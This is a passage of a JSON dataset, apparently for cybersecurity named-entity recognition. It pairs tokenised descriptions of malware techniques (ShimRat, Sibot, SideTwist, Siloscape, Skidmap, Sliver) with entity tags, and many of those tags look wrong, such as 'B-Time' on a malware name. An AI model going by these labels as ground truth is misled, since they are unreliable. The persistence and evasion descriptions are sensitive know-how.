[ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "has", + "installed", + "a", + "registry", + "based", + "start-up", + "key", + "<code>HKCU\\Software\\microsoft\\windows\\CurrentVersion\\Run</code>", + "to", + "maintain", + "persistence", + "should", + "other", + "methods", + "fail." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "can", + "sleep", + "when", + "instructed", + "to", + "do", + "so", + "by", + "the", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat's", + "loader", + "has", + "been", + "packed", + "with", + "the", + "compressed", + "ShimRat", + "core", + "DLL", + "and", + "the", + "legitimate", + "DLL", + "for", + "it", + "to", + "hijack." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "communicated", + "over", + "HTTP", + "and", + "HTTPS", + "with", + "C2", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "can", + "be", + "issued", + "a", + "command", + "shell", + "function", + "from", + "the", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRat", + "has", + "installed", + "a", + "Windows", + "service", + "to", + "maintain", + "persistence", + "on", + "victim", + "machines." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "listed", + "all", + "non-privileged", + "and", + "privileged", + "accounts", + "available", + "on", + "the", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "used", + "LZ", + "compression", + "to", + "compress", + "initial", + "reconnaissance", + "reports", + "before", + "sending", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "gathered", + "information", + "automatically,", + "without", + "instruction", + "from", + "a", + "C2,", + "related", + "to", + "the", + "user", + "and", + "host", + "machine", + "that", + "is", + "compiled", + "into", + "a", + "report", + "and", + "sent", + "to", + "the", + "operators." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "sent", + "collected", + "system", + "and", + "network", + "information", + "compiled", + "into", + "a", + "report", + "to", + "an", + "adversary-controlled", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "sent", + "generated", + "reports", + "to", + "the", + "C2", + "via", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "had", + "the", + "ability", + "to", + "download", + "additional", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "spoofed", + "itself", + "as", + "<code>AlphaZawgyl_font.exe</code>,", + "a", + "specialized", + "Unicode", + "font." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "used", + "several", + "Windows", + "API", + "functions", + "to", + "gather", + "information", + "from", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "encrypted", + "gathered", + "information", + "with", + "a", + "combination", + "of", + "shifting", + "and", + "XOR", + "using", + "a", + "static", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "gathered", + "the", + "local", + "privileges", + "for", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "listed", + "all", + "running", + "processes", + "on", + "the", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "gathered", + "a", + "list", + "of", + "installed", + "software", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "gathered", + "the", + "operating", + "system", + "name", + "and", + "specific", + "Windows", + "version", + "of", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "gathered", + "the", + "local", + "proxy,", + "domain,", + "IP,", + "routing", + "tables,", + "mac", + "address,", + "gateway,", + "DNS", + "servers,", + "and", + "DHCP", + "status", + "information", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "used", + "the", + "Windows", + "function", + "<code>GetExtendedUdpTable</code>", + "to", + "detect", + "connected", + "UDP", + "endpoints." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ShimRatReporter", + "communicated", + "over", + "HTTP", + "with", + "preconfigured", + "C2", + "servers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "has", + "obfuscated", + "scripts", + "used", + "in", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "can", + "decrypt", + "data", + "received", + "from", + "a", + "C2", + "and", + "save", + "to", + "a", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "will", + "delete", + "itself", + "if", + "a", + "certain", + "server", + "response", + "is", + "received." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "has", + "installed", + "a", + "second-stage", + "script", + "in", + "the", + "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot</code>", + "registry", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "will", + "delete", + "an", + "associated", + "registry", + "key", + "if", + "a", + "certain", + "server", + "response", + "is", + "received." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "can", + "download", + "and", + "execute", + "a", + "payload", + "onto", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "has", + "downloaded", + "a", + "DLL", + "to", + "the", + "<code>C:\\windows\\system32\\drivers\\</code>", + "folder", + "and", + "renamed", + "it", + "with", + "a", + "<code>.sys</code>", + "extension." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "has", + "modified", + "the", + "Registry", + "to", + "install", + "a", + "second-stage", + "script", + "in", + "the", + "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Sibot", + "has", + "been", + "executed", + "via", + "MSHTA", + "application." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Sibot", + "has", + "queried", + "the", + "registry", + "for", + "proxy", + "server", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "has", + "executed", + "downloaded", + "DLLs", + "with", + "<code>rundll32.exe</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Sibot", + "has", + "been", + "executed", + "via", + "a", + "scheduled", + "task." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "checked", + "if", + "the", + "compromised", + "system", + "is", + "configured", + "to", + "use", + "proxies." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "has", + "retrieved", + "a", + "GUID", + "associated", + "with", + "a", + "present", + "LAN", + "connection", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "executes", + "commands", + "using", + "VBScript." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Sibot", + "communicated", + "with", + "its", + "C2", + "server", + "via", + "HTTP", + "GET", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "has", + "used", + "a", + "legitimate", + "compromised", + "website", + "to", + "download", + "DLLs", + "to", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sibot", + "has", + "used", + "WMI", + "to", + "discover", + "network", + "connections", + "and", + "configurations.", + "Sibot", + "has", + "also", + "used", + "the", + "Win32_Process", + "class", + "to", + "execute", + "a", + "malicious", + "DLL." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "can", + "embed", + "C2", + "responses", + "in", + "the", + "source", + "code", + "of", + "a", + "fake", + "Flickr", + "webpage." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "has", + "the", + "ability", + "to", + "upload", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "can", + "decode", + "and", + "decrypt", + "messages", + "received", + "from", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "has", + "exfiltrated", + "data", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "has", + "primarily", + "used", + "port", + "443", + "for", + "C2", + "but", + "can", + "use", + "port", + "80", + "as", + "a", + "fallback." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "has", + "the", + "ability", + "to", + "search", + "for", + "specific", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "has", + "the", + "ability", + "to", + "download", + "additional", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "can", + "use", + "<code>GetUserNameW</code>,", + "<code>GetComputerNameW</code>,", + "and", + "<code>GetComputerNameExW</code>", + "to", + "gather", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "SideTwist", + "has", + "used", + "Base64", + "for", + "encoded", + "C2", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "can", + "encrypt", + "C2", + "communications", + "with", + "a", + "randomly", + "generated", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "can", + "collect", + "the", + "computer", + "name", + "of", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "has", + "the", + "ability", + "to", + "collect", + "the", + "domain", + "name", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "can", + "collect", + "the", + "username", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "has", + "used", + "HTTP", + "GET", + "and", + "POST", + "requests", + "over", + "port", + "443", + "for", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SideTwist", + "can", + "execute", + "shell", + "commands", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "connects", + "to", + "an", + "IRC", + "server", + "for", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "can", + "send", + "kubectl", + "commands", + "to", + "victim", + "clusters", + "through", + "an", + "IRC", + "channel", + "and", + "can", + "run", + "kubectl", + "locally", + "to", + "spread", + "once", + "within", + "a", + "victim", + "cluster." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "has", + "decrypted", + "the", + "password", + "of", + "the", + "C2", + "server", + "with", + "a", + "simple", + "byte", + "by", + "byte", + "XOR.", + "Siloscape", + "also", + "writes", + "both", + "an", + "archive", + "of", + "Tor", + "and", + "the", + "<code>unzip</code>", + "binary", + "to", + "disk", + "from", + "data", + "embedded", + "within", + "the", + "payload", + "using", + "Visual", + "Studio’s", + "Resource", + "Manager." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "maps", + "the", + "host’s", + "C", + "drive", + "to", + "the", + "container", + "by", + "creating", + "a", + "global", + "symbolic", + "link", + "to", + "the", + "host", + "through", + "the", + "calling", + "of", + "<code>NtSetInformationSymbolicLink</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "is", + "executed", + "after", + "the", + "attacker", + "gains", + "initial", + "access", + "to", + "a", + "Windows", + "container", + "using", + "a", + "known", + "vulnerability." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "has", + "leveraged", + "a", + "vulnerability", + "in", + "Windows", + "containers", + "to", + "perform", + "an", + "Escape", + "to", + "Host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "searches", + "for", + "the", + "Kubernetes", + "config", + "file", + "and", + "other", + "related", + "files", + "using", + "a", + "regular", + "expression." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "uses", + "Tor", + "to", + "communicate", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Tool", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "makes", + "various", + "native", + "API", + "calls." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "itself", + "is", + "obfuscated", + "and", + "uses", + "obfuscated", + "API", + "calls." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "checks", + "for", + "Kubernetes", + "node", + "permissions." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "searches", + "for", + "the", + "kubectl", + "binary." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "impersonates", + "the", + "main", + "thread", + "of", + "<code>CExecSvc.exe</code>", + "by", + "calling", + "<code>NtImpersonateThread</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Siloscape", + "can", + "run", + "cmd", + "through", + "an", + "IRC", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Skeleton", + "Key", + "is", + "used", + "to", + "patch", + "an", + "enterprise", + "domain", + "controller", + "authentication", + "process", + "with", + "a", + "backdoor", + "password.", + "It", + "allows", + "adversaries", + "to", + "bypass", + "the", + "standard", + "authentication", + "system", + "to", + "use", + "a", + "defined", + "password", + "for", + "all", + "accounts", + "authenticating", + "to", + "that", + "domain", + "controller." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "installed", + "itself", + "via", + "crontab." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "the", + "ability", + "to", + "download,", + "unpack,", + "and", + "decrypt", + "tar.gz", + "files", + "." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "the", + "ability", + "to", + "set", + "SELinux", + "to", + "permissive", + "mode." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "encrypted", + "it's", + "main", + "payload", + "using", + "3DES." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "checked", + "for", + "the", + "existence", + "of", + "specific", + "files", + "including", + "<code>/usr/sbin/setenforce</code>", + "and", + "<code>", + "/etc/selinux/config</code>.", + "It", + "also", + "has", + "the", + "ability", + "to", + "monitor", + "the", + "cryptocurrency", + "miner", + "file", + "and", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "the", + "ability", + "to", + "download", + "files", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "the", + "ability", + "to", + "install", + "several", + "loadable", + "kernel", + "modules", + "(LKMs)", + "on", + "infected", + "machines." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "created", + "a", + "fake", + "<code>rm</code>", + "binary", + "to", + "replace", + "the", + "legitimate", + "Linux", + "binary." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "the", + "ability", + "to", + "replace", + "the", + "pam_unix.so", + "file", + "on", + "an", + "infected", + "machine", + "with", + "its", + "own", + "malicious", + "version", + "that", + "accepts", + "a", + "specific", + "backdoor", + "password", + "for", + "all", + "users." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "monitored", + "critical", + "processes", + "to", + "ensure", + "resiliency." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "is", + "a", + "kernel-mode", + "rootkit", + "used", + "for", + "cryptocurrency", + "mining." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "is", + "a", + "kernel-mode", + "rootkit", + "that", + "has", + "the", + "ability", + "to", + "hook", + "system", + "calls", + "to", + "hide", + "specific", + "files", + "and", + "fake", + "network", + "and", + "CPU-related", + "statistics", + "to", + "make", + "the", + "CPU", + "load", + "of", + "the", + "infected", + "machine", + "always", + "appear", + "low." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "the", + "ability", + "to", + "add", + "the", + "public", + "key", + "of", + "its", + "handlers", + "to", + "the", + "<code>authorized_keys</code>", + "file", + "to", + "maintain", + "persistence", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "the", + "ability", + "to", + "check", + "if", + "<code>/usr/sbin/setenforce</code>", + "exists.", + "This", + "file", + "controls", + "what", + "mode", + "SELinux", + "is", + "in." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "the", + "ability", + "to", + "check", + "whether", + "the", + "infected", + "system’s", + "OS", + "is", + "Debian", + "or", + "RHEL/CentOS", + "to", + "determine", + "which", + "cryptocurrency", + "miner", + "it", + "should", + "use." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Skidmap", + "has", + "used", + "<code>pm.sh</code>", + "to", + "download", + "and", + "install", + "its", + "main", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "has", + "the", + "ability", + "to", + "manipulate", + "user", + "tokens", + "on", + "targeted", + "Windows", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "can", + "use", + "mutual", + "TLS", + "and", + "RSA", + "cryptography", + "to", + "exchange", + "a", + "session", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "can", + "support", + "C2", + "communications", + "over", + "DNS." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Sliver", + "can", + "encrypt", + "strings", + "at", + "compile", + "time." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "can", + "exfiltrate", + "files", + "from", + "the", + "victim", + "using", + "the", + "<code>download</code>", + "command." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "can", + "enumerate", + "files", + "on", + "a", + "target", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "can", + "upload", + "files", + "from", + "the", + "C2", + "server", + "to", + "the", + "victim", + "machine", + "using", + "the", + "<code>upload</code>", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "can", + "inject", + "code", + "into", + "local", + "and", + "remote", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sliver", + "can", 